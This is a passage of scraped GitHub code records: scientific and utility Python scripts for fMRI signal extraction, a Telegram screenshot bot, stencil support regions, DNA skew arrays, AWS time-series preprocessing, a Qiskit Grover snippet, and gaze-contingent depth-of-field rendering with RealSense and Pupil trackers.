runs_bidsfiles_per_subjects:\n run_bidsfile_ids = bold.get_keys_of_interest(run_bidsfile)\n tr_per_run = bold.get_tr_per_run(run_bidsfile)\n\n run_nifti_path = run_bidsfile.path\n bold_signals_confounds = bold.get_bold_signals_confounds(run_nifti_path, confounds_strategies)\n\n bold_signal = bold.calculate_bold_signals(run_nifti_path, atlas_path)\n bold_signal_cleaned = bold.clean_bold_signals(bold_signal, bold_signals_confounds, tr_per_run)\n\n runs_bidsfiles_ids_list_per_subject.append(run_bidsfile_ids)\n bold_signals_list_per_subject.append(str(bold_signal_cleaned))\n tr_runs_per_subject.append(tr_per_run)\n\n bold_signals_per_subject_df_output = bold.store_bold_signals_in_df(bold_signals_list_per_subject, tr_runs_per_subject,\n runs_bidsfiles_ids_list_per_subject,\n confounds_strategies)\n\n csv_output_path = os.path.join(sub_dir, 'id_boldsignals.csv'.replace('id', subj_id))\n bold.save_bold_signals_output(bold_signals_per_subject_df_output, csv_output_path)\n\n bold_signals_config.loc['path', subj_id] = csv_output_path\n bold_signals_config.loc['nlevels', subj_id] = bold_signals_per_subject_df_output.columns.nlevels\n\nbold_signals_config.to_csv(info_csv_path, header=True)\n\n","repo_name":"pnplab/biotypes_robust","sub_path":"connectomes_extraction/calcul_boldsignals.py","file_name":"calcul_boldsignals.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"20065912269","text":"import sys\nimport time\nimport telepot\nimport pyautogui\nfrom telepot.loop import MessageLoop\nfrom tokens import *\n\nclass MyBot(telepot.Bot):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(MyBot, self).__init__(*args, **kwargs)\n\t\tself.answerer = telepot.helper.Answerer(self)\n\t\tself._message_with_inline_keyboard = None\n\t\t\n\tdef on_chat_message(self, 
msg):\n\t\tcontent_type, chat_type, chat_id = telepot.glance(msg)\n\t\t\n\t\t# For debugging and get admin id\n\t\t# print(content_type, chat_type, chat_id)\n\t\n\t\tif chat_id in adminId:\n\t\t\tif content_type == 'text':\n\t\t\t\tif msg['text'] == '/capture':\n\t\t\t\t\tbot.sendChatAction(chat_id, 'typing')\n\t\t\t\t\tbot.sendMessage(chat_id, \"Capturing image\")\n\t\t\t\t\tself.capture_img()\n\t\t\t\t\tbot.sendPhoto(chat_id, photo=open('img\\\\screenshot.png', 'rb'))\n\t\t\n\t\telse:\n\t\t\tbot.sendMessage(chat_id, \"Not admin\")\n\tdef capture_img(self):\n\t\tpic = pyautogui.screenshot()\n\t\tpic.save('img\\\\screenshot.png')\n\t\treturn\n\t\nTOKEN = telegrambot\n\nbot = MyBot(TOKEN)\nMessageLoop(bot).run_as_thread()\n# Umcomment for debugging\n# print('Listening ...')\n\nwhile 1:\n\ttime.sleep(10)","repo_name":"shafiqsaaidin/monbot","sub_path":"mon.py","file_name":"mon.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"94"} +{"seq_id":"30369125974","text":"\"\"\"\nObjects relating to the support region of the basis used to impose the boundary\nconditions.\n\"\"\"\n\nimport numpy as np\nfrom devito.tools.data_structures import frozendict\nfrom functools import reduce\nfrom schism.geometry.skin import stencil_footprint\n\n\ndef get_points_and_oob(support_points, modified_points, geometry):\n \"\"\"\n Get the points used by each stencil and a mask indicating where these are\n out of bounds.\n\n Parameters\n ----------\n support_points : tuple\n Points in the support region of the stencil\n modified_points : tuple\n Points where modified stencils are required\n geometry : BoundaryGeometry\n Geometry of the boundary. Used to obtain the Grid.\n\n Returns\n -------\n points : tuple\n Points accessed by the stencil when applied at the modified points\n oob : ndarray\n Boolean mask for points. True where points are out of bounds\n \"\"\"\n grid = geometry.grid\n ndims = len(grid.dimensions)\n points = tuple([support_points[dim][:, np.newaxis]\n + modified_points[dim][np.newaxis, :]\n for dim in range(ndims)])\n\n # Out of bounds points\n oob = [np.logical_or(points[dim] < 0, points[dim] >= grid.shape[dim])\n for dim in range(ndims)]\n\n # If a point is out of bounds in any dimension, then label as oob\n oob_msk = reduce(np.logical_or, oob)\n\n return points, oob_msk\n\n\ndef footprint_union(fp1, fp2):\n \"\"\"Get the union of two stencil footprints\"\"\"\n fpa1 = np.array(fp1)\n fpa2 = np.array(fp2)\n fp_all = np.concatenate((fpa1, fpa2), axis=-1)\n fp_union = np.unique(fp_all, axis=-1)\n # The union footprint\n footprint = tuple([fp_union[i] for i in range(fp_union.shape[0])])\n # The mask points of fp2 in union footprint\n # Compares the coordinates, checks there is a match in all dims,\n # then sets true where a coordinate from fpa2 is located in\n # fp_union\n mask = (fp_union[:, np.newaxis] == fpa2[..., np.newaxis]).all(0).any(0)\n return footprint, mask\n\n\nclass SupportRegion:\n \"\"\"\n The support region for a set of basis functions.\n\n Parameters\n ----------\n basis_map : dict\n Mapping between functions and their respective basis functions\n radius_map : dict\n Mapping between functions and the radius of their basis. Note that this\n is not a true radius, so much as a convenient measure of extent\n measured in grid increments.\n deriv : Derivative\n The derivative of the underlying stencil. 
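# The broadcasting pattern inside get_points_and_oob above, shrunk to one dimension with
# concrete numbers (a sketch, not the schism API). Every stencil offset is added to every
# application point in one shot, and anything landing outside the grid is flagged.
import numpy as np

offsets = np.array([-2, -1, 0, 1, 2])      # stencil support points
points = np.array([0, 5, 9])               # where modified stencils are needed
extent = 10                                # grid size in this dimension

accessed = offsets[:, np.newaxis] + points[np.newaxis, :]   # shape (n_offsets, n_points)
oob = np.logical_or(accessed < 0, accessed >= extent)

print(accessed[:, 0])   # [-2 -1  0  1  2]: the first two entries fall off the grid
print(oob[:, 0])        # [ True  True False False False]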
Used to ensure that\n the resultant support region is the union of extrapolant and\n interior stencils.\n\n Attributes\n ----------\n footprint_map : dict\n Mapping between functions and the points within their support region\n npts_map : dict\n Mapping between functions and the number of points within their support\n region.\n max_span_func : Function\n The function with the largest span\n\n Methods\n -------\n expand_radius(inc)\n Return a support region with an expanded radius\n \"\"\"\n def __init__(self, basis_map, radius_map, deriv):\n self._basis_map = basis_map\n self._radius_map = radius_map\n self._max_span_func = max(self.radius_map, key=self.radius_map.get)\n\n # Derivative for footprint of the underlying stencil\n self._deriv = deriv\n\n self._get_footprint()\n\n def _get_footprint(self):\n \"\"\"Get the stencil footprint for each function\"\"\"\n footprints = {}\n npts_map = {}\n if self.basis_map.keys() != self.radius_map.keys():\n # Should never end up here\n raise ValueError(\"Mismatch in functions supplied\")\n\n for func in self.basis_map:\n if self.basis_map[func].dims == func.space_dimensions:\n # N-D basis so N-D support region\n footprint = self._get_circle_support(func)\n else:\n if len(self.basis_map[func].dims) != 1:\n # Should never end up here\n raise ValueError(\"Basis neither 1D or N-D\")\n # 1D basis\n footprint = self._get_linear_support(func)\n footprints[func] = footprint\n\n if func is self.deriv.expr:\n base_footprint = self._get_base_support()\n # Get union with support region of interior\n # stencil. This prevents issues when interior\n # stencils have a larger footprint than that\n # used for extrapolation.\n union, mask = footprint_union(base_footprint,\n footprints[func])\n footprints[func] = union\n self._extrapolant_mask = mask\n npts_map[func] = footprints[func][0].shape[0]\n self._footprint_map = frozendict(footprints)\n self._npts_map = frozendict(npts_map)\n\n def _get_circle_support(self, func):\n \"\"\"Get the footprint of a circular support region\"\"\"\n # Essentially makes a square then cookie-cutters it\n radius = self.radius_map[func]\n dims = func.space_dimensions\n ndims = len(dims)\n # Make a meshgrid of indices (of int type)\n # Indexing type changes order of points but not points overall\n # 'ij' results in most logical ordering however\n msh = np.meshgrid(*[np.arange(-radius, radius+1, dtype=int)\n for dim in dims],\n indexing='ij')\n # Mask it by radius\n mask = np.sqrt(sum(msh[i]**2 for i in range(ndims))) < radius + 0.5\n # Do np.where to get meshgrid indices\n locs = np.where(mask)\n # Use indices to get the physical indices from the meshgrid\n footprint = [msh[i][locs].flatten() for i in range(ndims)]\n # Return these as a tuple of arrays\n return tuple(footprint)\n\n def _get_linear_support(self, func):\n \"\"\"Get the footprint of a 1D support region\"\"\"\n footprint = []\n basis = self.basis_map[func]\n radius = self.radius_map[func]\n for dim in func.space_dimensions:\n if dim in basis.dims:\n footprint.append(np.arange(-radius, radius+1, dtype=int))\n else: # No offset in other dimensions\n footprint.append(np.zeros(1+2*radius, dtype=int))\n return tuple(footprint)\n\n def _get_base_support(self):\n \"\"\"Get the footprint of the interior stencil\"\"\"\n footprint = stencil_footprint(self.deriv)\n return footprint\n\n def expand_radius(self, inc):\n \"\"\"\n Return another support region with radius expanded by the increment\n specified\n\n Parameters\n ----------\n inc : int\n The amount by which the radius should be 
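# A concrete check of the circular footprint built by _get_circle_support above: for radius 2
# the mask keeps every integer offset within 2.5 of the origin, i.e. the full 5x5 block minus
# its four corners, 21 points in total.
import numpy as np

radius = 2
msh = np.meshgrid(*[np.arange(-radius, radius + 1, dtype=int)] * 2, indexing='ij')
mask = np.sqrt(msh[0] ** 2 + msh[1] ** 2) < radius + 0.5
footprint = tuple(m[np.where(mask)].flatten() for m in msh)
print(footprint[0].shape[0])   # 21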
incremented\n\n Returns\n -------\n expanded : SupportRegion\n The expanded support region\n \"\"\"\n new_radius_map = {func: rad + inc\n for func, rad in self.radius_map.items()}\n return self.__class__(self.basis_map, new_radius_map, self.deriv)\n\n @property\n def basis_map(self):\n \"\"\"Mapping between functions and respective basis functions\"\"\"\n return self._basis_map\n\n @property\n def radius_map(self):\n \"\"\"Mapping between functions and the radius of their basis\"\"\"\n return self._radius_map\n\n @property\n def max_span_func(self):\n \"\"\"The function with the largest support region span\"\"\"\n return self._max_span_func\n\n @property\n def footprint_map(self):\n \"\"\"\n Mapping between functions and the footprint of their support region.\n \"\"\"\n return self._footprint_map\n\n @property\n def npts_map(self):\n \"\"\"\n Mapping between functions and the number of points in their support\n regions.\n \"\"\"\n return self._npts_map\n\n @property\n def deriv(self):\n \"\"\"\n Footprint of the underlying derivative stencil. Used when i\n \"\"\"\n return self._deriv\n\n @property\n def extrapolant_mask(self):\n \"\"\"\n Return the mask limiting the footprint in the field on which the\n derivative is taken to that of the extrapolation support region.\n \"\"\"\n return self._extrapolant_mask\n","repo_name":"devitocodes/schism","sub_path":"schism/geometry/support_region.py","file_name":"support_region.py","file_ext":"py","file_size_in_byte":8337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"44157011496","text":"# Write a function SkewArray(Genome) that takes a DNA string Genome as input \n# and returns the skew array of Genome in the form of a list whose i-th \n# element is Skew[i]. 
Then add this function to Replication.py.\nimport matplotlib.pyplot as plt\n\ndef skewArray(genome):\n array = [0 for i in range(len(genome) + 1)]\n\n for i in range(len(genome)):\n if genome[i] == 'A' or genome[i] == 'T':\n array[i+1] = array[i]\n elif genome[i] == 'G':\n array[i+1] = array[i] + 1\n elif genome[i] == 'C':\n array[i+1] = array[i] - 1\n return array\n\n\ndef skewArray2(genome):\n array = [0 for i in range(len(genome) + 1)]\n result = {}\n\n for i in range(len(genome)):\n if genome[i] == 'A' or genome[i] == 'T':\n array[i+1] = array[i]\n elif genome[i] == 'G':\n array[i+1] = array[i] + 1\n elif genome[i] == 'C':\n array[i+1] = array[i] - 1\n for i in range(len(array)):\n result[i] = array[i]\n return result\n\nif __name__ == '__main__':\n \"\"\" array = skewArray('AGCGTGCCGAAATATGCCGCCAGACCTGCTGCGGTGGCCTCGCCGACTTCACGGATGCCAAGTGCATAGAGGAAGCGAGCAAAGGTGGTTTCTTTCGCTTTATCCAGCGCGTTAACCACGTTCTGTGCCGACTTT')\n plt.plot(array[:], marker='o')\n plt.show() \"\"\"\n skew = skewArray(\"GATACACTTCCCGAGTAGGTACTG\")\n print(skew)\n\n","repo_name":"PaulOnyekwelu/biology-meets-programming","sub_path":"week-2/skew_array.py","file_name":"skew_array.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"23204884080","text":"import pickle\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport sagemaker\nimport boto3 \nimport s3fs\nimport json\nimport datetime\nfrom tzlocal import get_localzone as tzlocal\nimport numpy as np\nimport datetime\nfrom tzlocal import get_localzone as tzlocal\nimport boto3\nfrom tqdm import tqdm_notebook as tqdm\nimport os\nfrom os import path \nimport json\nfrom deep_ar import series_to_jsonline\n\nbmw_bucket_name = os.environ['BMW_DATA_BUCKET'] #'fog-bigdata-bmw-data'\ndata_bucket_name = os.environ['SANITIZED_DATA_BUCKET'] #'fog-datasets'\ndata_freq = os.environ['DATA_FREQUENCY'] #'5min'\n\ns3_con = boto3.client('s3')\nobj_list = s3_con.list_objects(Bucket=bmw_bucket_name,Prefix='metrics2/output')['Contents']\nfile_names = [key['Key'] for key in obj_list]\n\ndata = []\nfor file_name in tqdm(file_names):\n # Select file with the correct extension\n if not file_name.endswith('output.json'):\n continue\n file_str = s3_con.get_object(Bucket=bmw_bucket_name, Key=file_name).get('Body').read().decode('utf-8')\n batch = eval(file_str)\n \n # Aggregates response code into a unique time series\n for code in ['response-code-200','response-code-4xx','response-code-5xx']:\n if code not in batch.keys():\n continue\n data = data + batch[code]['Datapoints']\n \n# Creates a pandas Dataframe from data\ndf = pd.DataFrame(data)\ndf.index = [i.replace(tzinfo=None) for i in pd.to_datetime(df.Timestamp)]\ndf = df.drop(columns=['Unit'])\ndf = df.groupby('Timestamp').max()\nseries = pd.Series(data=df.SampleCount.values, index=[i.replace(tzinfo=None) for i in pd.to_datetime(df.index)])\nseries = series.sort_index()\n#series = series[series.index < datetime.datetime(2019,1,26,0,0,0)]\nseries = series.groupby([pd.Grouper(freq=data_freq)]).sum()\n\n# Apply a running mean of the previous 15 minutes to each datapoint -> smoothing to remove anomalies and have a clean training set\nn_backsteps = 5\nconv = np.hstack([np.ones(n_backsteps)/n_backsteps,np.zeros(n_backsteps-1)])\npad_vals = np.pad(series.values,n_backsteps-1,mode='edge')\nseries = pd.Series(data=np.convolve(pad_vals,conv,mode='valid'),index=series.index)\n\n\n# Scale down a part of the data (that was incorrectly scaled, for 
unknown reasons)\nseries[np.logical_and(series.index >= pd.Timestamp(2019,1,26),series.index < pd.Timestamp(2019,1,31,8,55))] /= 2 \n\ntest_idx = np.logical_and(series.index > datetime.datetime(2019,1,28,0,0,0), series.index <= datetime.datetime(2019,2,4,0,0,0))\ntrain_idx = series.index <= datetime.datetime(2019,1,28,0,0,0)\n\n\n# Upload RCF-shaped data\nprint(\"Uploading RCF-shaped data\")\nprefix = 'rcf'\n\ns3_data_path = \"{}/{}/data\".format(data_bucket_name, prefix)\ns3filesystem = s3fs.S3FileSystem()\n\nwith s3filesystem.open(s3_data_path + \"/train/data.csv\", 'w') as fp:\n fp.write(series[train_idx].to_csv())\n\nwith s3filesystem.open(s3_data_path + \"/test/data.csv\", 'w') as fp:\n fp.write(series[test_idx].to_csv())\n\n# Upload DeepAR-shaped data\nprint(\"Uploading DeepAR-shaped data\")\n\n# Create feature series of holidays\nend_of_holiday = datetime.date(2019, 1, 7)\nholidays_data = [1 if time < pd.Timestamp(end_of_holiday,tz=None) else 0 for time in series.index]\nholidays_feature_serie = pd.Series(data=holidays_data, index=series.index)\n\n# Create feature series of weekends\nweekends_date = [0 if time.weekday() < 5 else 1 for time in series.index]\nweekends_feature_series = pd.Series(data=weekends_date, index=series.index)\n\n\n# Upload preprocessed data for deep AR\nprefix = 'deep_ar'\ns3_data_path = \"{}/{}/data\".format(data_bucket_name, prefix)\n\nwith s3filesystem.open(s3_data_path + \"/train/data.json\", 'w') as fp:\n fp.write(series_to_jsonline(series[train_idx], [list(holidays_feature_serie[train_idx]), list(weekends_feature_series[train_idx])]))\n\nwith s3filesystem.open(s3_data_path + \"/test/data.json\", 'w') as fp:\n fp.write(series_to_jsonline(series[test_idx], [list(holidays_feature_serie[test_idx]), list(weekends_feature_series[test_idx])]))\n\n","repo_name":"AlexandreRozier/BigDataAnalytics","sub_path":"models/deep_ar/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"72341191029","text":"\nfrom qiskit import *\nimport matplotlib.pyplot as plt\nimport numpy as np\n\noracle = QuantumCircuit(2, name='oracle')\noracle.cz(0,1)\noracle.to_gate()\noracle.draw()\n\nbackend = Aer.get_backend('statevector_simulator')\ngrover_circ = QuantumCircuit(2, 2)\ngrover_circ.h([0, 1])\ngrover_circ.append(oracle, [0,1])\ngrover_circ.draw()\n\njob = execute(grover_circ, backend)\nresult = job.result()\nsv = result.get_statevector()\nnp.round(sv, 2)","repo_name":"watermelonich/quantum-programs","sub_path":"grover search algorithm/gr2.py","file_name":"gr2.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"28690334718","text":"import pdb\nimport sys\nimport pyrealsense2 as rs\nimport numpy as np\nimport cv2\nfrom math import pi\nimport time\n\nimport zmq\nfrom msgpack import loads\nimport threading\n\nimport numpy as np\nimport math\nimport time\nimport scipy.io\nfrom sklearn.linear_model import LinearRegression\n\nfrom skimage import color, data, restoration, metrics\n\nimport screeninfo\n\n#Get ScreenInfo\nscreen_id = 1\nscreen = screeninfo.get_monitors()[screen_id]\nresolution = [screen.width, screen.height]\n\n## Setting for realsense\nREALSENSE_CAMERA = \"D435\" #D435 / L515\n\n# Camera setting and tracking setting\nif REALSENSE_CAMERA == \"D435\" :\n DEPTH_CAMERA_MAX_THETA = 57 / 2.0 * (pi / 180)\n 
DEPTH_CAMERA_MAX_PHI = 86 / 2.0 * (pi / 180)\n COLOR_CAMERA_MAX_THETA = 41 / 2.0 * (pi / 180)\n COLOR_CAMERA_MAX_PHI = 64 / 2.0 * (pi / 180)\nelif REALSENSE_CAMERA == \"L515\" :\n DEPTH_CAMERA_MAX_THETA = 55 / 2.0 * (pi / 180)\n DEPTH_CAMERA_MAX_PHI = 70 / 2.0 * (pi / 180)\n COLOR_CAMERA_MAX_THETA = 43 / 2.0 * (pi / 180)\n COLOR_CAMERA_MAX_PHI = 70 / 2.0 * (pi / 180)\n\nif REALSENSE_CAMERA == \"D435\" :\n DEPTH_CAMERA_RES = 640,480\n COLOR_CAMERA_RES = 640,480\nelif REALSENSE_CAMERA == \"L515\" :\n DEPTH_CAMERA_RES = 1024,768\n COLOR_CAMERA_RES = 1280,720\n\n## Setting for Pupil_tracker\naddr = '127.0.0.1' # remote ip or localhost\nreq_port = \"50020\" # same as in the pupil remote gui\n\n## Setting for inverse filtering image\npupil_diameter = 2e-3\neye_length = 24e-3\neye_relief = 1e-1\nkernel_radius_pixel = 21\nnum_slicing_imgs = 4 # for rendering_display\n\n# Convert matrix default setting\nconvert_matrix = np.array([[1.0078, 0.1722, 0.0502], [0, 0, 0], [0.0532, -0.6341, 0.7817]])\n\n\ndef make_convert_matrix(sub):\n \"\"\"\n front side = input degree is 184\n (x_1, y_1, z_1): world coordinate\n (x_2, y_2, z_2): viewing coordinate (pupil camera coordinate)\n \"\"\"\n coord_1 = None\n coord_2 = None\n\n degree = input(\"type observed degree:\")\n while(degree != 'end' and degree != '-1'):\n degree = float(degree)\n theta_1 = pi / 2\n phi_1 = (degree - 184 + 90) * pi / 180\n x_1 = - np.sin(theta_1) * np.cos(phi_1)\n y_1 = np.cos(theta_1)\n z_1 = np.sin(theta_1) * np.sin(phi_1)\n\n sub.connect(b\"tcp://%s:%s\" %(addr.encode('utf-8'),sub_port))\n topic,msg_1 = sub.recv_multipart()\n message_1 = loads(msg_1)\n theta_2 = message_1[b'theta']\n phi_2 = message_1[b'phi']\n sub.disconnect(b\"tcp://%s:%s\" %(addr.encode('utf-8'),sub_port))\n\n x_2 = np.sin(theta_2) * np.cos(phi_2)\n y_2 = np.cos(theta_2)\n z_2 = np.sin(theta_2) * np.sin(phi_2)\n\n if coord_1 is None:\n coord_1 = np.array([[x_1, y_1, z_1]])\n else:\n coord_1 = np.append(coord_1, [[x_1, y_1, z_1]], axis=0)\n if coord_2 is None:\n coord_2 = np.array([[x_2, y_2, z_2]])\n else:\n coord_2 = np.append(coord_2, [[x_2, y_2, z_2]], axis=0)\n\n degree = input(\"type observed degree:\")\n\n # coord_1 = np.array([[-0.5,\t0,\t0.866025404],[-0.342020143,\t0,\t0.939692621],[-0.173648178,\t0,\t0.984807753],[0,\t0,\t1],[0.173648178,\t0,\t0.984807753],[0.342020143,\t0,\t0.939692621],[0.5,\t0,\t0.866025404]])\n # coord_2 = np.array([[-0.420787921,\t-0.390899842,\t0.818617639],[-0.32087076,\t-0.557559388,\t0.765617061],[-0.137999648,\t-0.649991026,\t0.747307007],[0.083080865,\t-0.662271994,\t0.74464312],[0.274478632,\t-0.610046409,\t0.743306706],[0.418590941,\t-0.480357372,\t0.770738879],[0.460415755,\t-0.314987365,\t0.829939933]])\n\n print(\"coord_1 : \", coord_1)\n print(\"coord_2 : \", coord_2)\n\n model_x = LinearRegression(fit_intercept=False).fit(coord_2,coord_1[:,0])\n model_y = LinearRegression(fit_intercept=False).fit(coord_2, coord_1[:,1])\n model_z = LinearRegression(fit_intercept=False).fit(coord_2, coord_1[:,2])\n\n convert_matrix = np.array([model_x.coef_, model_y.coef_, model_z.coef_])\n return convert_matrix\n\n\ndef convert_pupil_to_realsense(theta, phi) :\n x = np.sin(theta) * np.cos(phi)\n y = np.cos(theta)\n z = np.sin(theta) * np.sin(phi)\n coord = np.array([[x],[y],[z]])\n\n converted_coord = np.dot(convert_matrix, coord)\n\n converted_x, converted_y, converted_z = converted_coord\n converted_theta = np.arctan(converted_y / converted_z)\n converted_phi = np.arctan(converted_x / converted_z)\n\n return converted_theta, 
converted_phi\n\ndef full_rendering_display(color_img, depth_img, gaze_depth, c = 8.0e+4):\n \"\"\"\n slice color image by 'each depth' in depth image. Create corresponding PSF on each slice. \n Apply convolution on every slice and add up every slice. return normalized reconstructed image.\n c : coefficient for gaussian psf\n \"\"\"\n eye_focal_length = 1 / (1 / gaze_depth + 1 / eye_length)\n color_img=color_img.astype(float)\n depth_img=depth_img.astype(float)\n filtered_img=np.zeros_like(color_img)\n edge = np.zeros_like(depth_img)\n\n # Calculate target intensity sum\n target_intensity_sum = np.sum(color_img)\n\n RES = COLOR_CAMERA_RES #resolution of color_img, detph_img\n x,y = np.meshgrid(np.linspace(-RES[0]//2, RES[0]//2-1,RES[0]), np.linspace(-RES[1]//2,RES[1]//2-1,RES[1]))\n radius = np.sqrt(x*x+y*y)\n\n depths = np.unique(depth_img[depth_img>0])\n\n sliced_color_imgs = []\n\n for depth in depths : \n pixel_select=np.zeros_like(depth_img)\n pixel_select[depth_img == depth] = 1 \n\n edge += cv2.Canny(np.uint8(pixel_select*255), 50, 100)\n pixel_select = np.stack((pixel_select,pixel_select,pixel_select), axis = 2)\n sliced_color_img = color_img * pixel_select\n sliced_color_imgs.append((sliced_color_img, depth / 1000.0))\n\n for sliced_color_img, mean_depth in sliced_color_imgs:\n b = (eye_focal_length / (gaze_depth - eye_focal_length))* pupil_diameter * abs(mean_depth - gaze_depth) / mean_depth # blur diameter\n kernel = np.zeros_like(sliced_color_img[:,:,0]) # same size with single channel of image (2D)\n \n if b == 0 :\n kernel[RES[1]//2, RES[0]//2] = 1 # delta function\n else :\n kernel = 2 / (pi * (c * b)**2) * np.exp(-2 * radius**2 / (c * b)**2)\n kernel[radius > kernel_radius_pixel] = 0 #Use 21*21 nonzero points near origin, otherwise, value is zero\n \n #normalization\n if np.sum(kernel) == 0: # when does this occurs? if psf is too small in every pixel\n kernel[res_window[1]//2, res_window[0]//2]=1\n else:\n kernel = kernel / np.sum(kernel)\n\n compensate_img = cv2.filter2D(sliced_color_img, -1, kernel)\n filtered_img += compensate_img\n\n #just add zero depth pixel to filtered image\n pixel_select = np.zeros_like(depth_img)\n pixel_select[depth_img==0] = 1\n pixel_select = np.stack((pixel_select, pixel_select, pixel_select), axis = 2)\n color_img_zero_depth = color_img * pixel_select\n filtered_img += color_img_zero_depth\n\n edge = np.clip(edge, 0, 255).astype('uint8')\n dilated_edge = cv2.dilate(edge, np.ones((3, 3)))\n dilated_edge = np.stack((dilated_edge, dilated_edge, dilated_edge), axis=2)\n\n #blurred_filtered_img = cv2.GaussianBlur(filtered_img, (5, 5), 0) # Smoothing boundary\n blurred_filtered_img = filtered_img # No smoothing boundary\n smoothed_filtered_img = np.where(dilated_edge==np.array([255,255,255]), blurred_filtered_img, filtered_img)\n\n #smoothed_filtered_img = filtered_img\n smoothed_filtered_img = np.clip(smoothed_filtered_img, 0, np.max(smoothed_filtered_img))\n smoothed_filtered_img = smoothed_filtered_img / np.sum(smoothed_filtered_img) * target_intensity_sum / 255.0\n smoothed_filtered_img = np.clip(smoothed_filtered_img, 0, 1)\n\n return smoothed_filtered_img, len(sliced_color_imgs)\n\ndef rendering_display(color_img, depth_img, gaze_depth, c = 8.0e+4, num_slicing_imgs = 4):\n \"\"\"\n slice color image by 'num_slicing_imgs' in depth image. Create corresponding PSF on each slice. \n Apply convolution on every slice and add up every slice. 
return normalized reconstructed image.\n c : coefficient for gaussian psf\n \"\"\"\n eye_focal_length = 1 / (1 / gaze_depth + 1 / eye_length)\n color_img=color_img.astype(float)\n depth_img=depth_img.astype(float)\n filtered_img=np.zeros_like(color_img)\n edge = np.zeros_like(depth_img)\n\n # Calculate target intensity sum\n target_intensity_sum = np.sum(color_img)\n\n RES = COLOR_CAMERA_RES #resolution of color_img, detph_img\n x,y = np.meshgrid(np.linspace(-RES[0]//2, RES[0]//2-1,RES[0]), np.linspace(-RES[1]//2,RES[1]//2-1,RES[1]))\n radius = np.sqrt(x*x+y*y)\n\n depths = depth_img[depth_img>0]\n percentiles = np.linspace(0,100,num_slicing_imgs+1)\n depth_bounds = np.percentile(depths, percentiles, interpolation='nearest')\n depths = np.unique(depths)\n\n sliced_color_imgs = []\n\n for idx in range(num_slicing_imgs): # idx th slice\n pixel_select=np.zeros_like(depth_img)\n for depth in depths: # create boolean mask\n if depth_bounds[idx] <= depth and depth< depth_bounds[idx+1]:\n pixel_select[depth_img==depth] = 1 \n \n if idx == num_slicing_imgs - 1 : # add last depth on last slice\n pixel_select[depth_img == depth_bounds[num_slicing_imgs]] = 1\n\n masked_depth_img = depth_img[pixel_select == 1]\n\n if len(masked_depth_img) == 0: # if masked_depth_img is blank\n continue\n \n mean_depth = np.mean(masked_depth_img)\n if int(gaze_depth*1000) in masked_depth_img :\n mean_depth = int(gaze_depth*1000)\n\n edge += cv2.Canny(np.uint8(pixel_select*255), 50, 100)\n pixel_select = np.stack((pixel_select,pixel_select,pixel_select), axis = 2)\n sliced_color_img = color_img * pixel_select\n sliced_color_imgs.append((sliced_color_img, mean_depth / 1000.0))\n\n for sliced_color_img, mean_depth in sliced_color_imgs:\n b = (eye_focal_length / (gaze_depth - eye_focal_length))* pupil_diameter * abs(mean_depth - gaze_depth) / mean_depth # blur diameter\n kernel = np.zeros_like(sliced_color_img[:,:,0]) # same size with single channel of image (2D)\n \n if b == 0 :\n kernel[RES[1]//2, RES[0]//2] = 1 # delta function\n else :\n kernel = 2 / (pi * (c * b)**2) * np.exp(-2 * radius**2 / (c * b)**2)\n kernel[radius > kernel_radius_pixel] = 0 #Use 21*21 nonzero points near origin, otherwise, value is zero\n \n #normalization\n if np.sum(kernel) == 0: # when does this occurs? 
if psf is too small in every pixel\n kernel[res_window[1]//2, res_window[0]//2]=1\n else:\n kernel = kernel / np.sum(kernel)\n\n compensate_img = cv2.filter2D(sliced_color_img, -1, kernel)\n filtered_img += compensate_img\n\n #just add zero depth pixel to filtered image\n pixel_select = np.zeros_like(depth_img)\n pixel_select[depth_img==0] = 1\n pixel_select = np.stack((pixel_select, pixel_select, pixel_select), axis = 2)\n color_img_zero_depth = color_img * pixel_select\n filtered_img += color_img_zero_depth\n\n edge = np.clip(edge, 0, 255).astype('uint8')\n dilated_edge = cv2.dilate(edge, np.ones((3, 3)))\n dilated_edge = np.stack((dilated_edge, dilated_edge, dilated_edge), axis=2)\n\n #blurred_filtered_img = cv2.GaussianBlur(filtered_img, (5, 5), 0) # Smoothing boundary\n blurred_filtered_img = filtered_img # No smoothing boundary\n smoothed_filtered_img = np.where(dilated_edge==np.array([255,255,255]), blurred_filtered_img, filtered_img)\n\n #smoothed_filtered_img = filtered_img\n smoothed_filtered_img = np.clip(smoothed_filtered_img, 0, np.max(smoothed_filtered_img))\n smoothed_filtered_img = smoothed_filtered_img / np.sum(smoothed_filtered_img) * target_intensity_sum / 255.0\n smoothed_filtered_img = np.clip(smoothed_filtered_img, 0, 1)\n\n return smoothed_filtered_img, len(sliced_color_imgs)\n\n\nif __name__ == \"__main__\":\n\n # Configure depth and color streams\n pipeline = rs.pipeline()\n config = rs.config()\n\n config.enable_stream(rs.stream.depth, DEPTH_CAMERA_RES[0], DEPTH_CAMERA_RES[1], rs.format.z16, 30)\n config.enable_stream(rs.stream.color, COLOR_CAMERA_RES[0], COLOR_CAMERA_RES[1], rs.format.bgr8, 30)\n\n # zero hole filling filter\n spatial = rs.spatial_filter()\n spatial.set_option(rs.option.filter_magnitude, 5)\n spatial.set_option(rs.option.filter_smooth_alpha, 1)\n spatial.set_option(rs.option.filter_smooth_delta, 50)\n spatial.set_option(rs.option.holes_fill, 3)\n hole_filling = rs.hole_filling_filter()\n\n # Align process for realsense frames\n align_to = rs.stream.color\n align = rs.align(align_to)\n\n # Start streaming for Realsense\n pipeline.start(config)\n\n # Start connecting pupil tracker\n context = zmq.Context()\n req = context.socket(zmq.REQ) #open a req port to talk to pupil\n req.connect(\"tcp://%s:%s\" %(addr,req_port))\n req.send(b'SUB_PORT') # ask for the sub port\n sub_port = req.recv()\n\n # open a sub 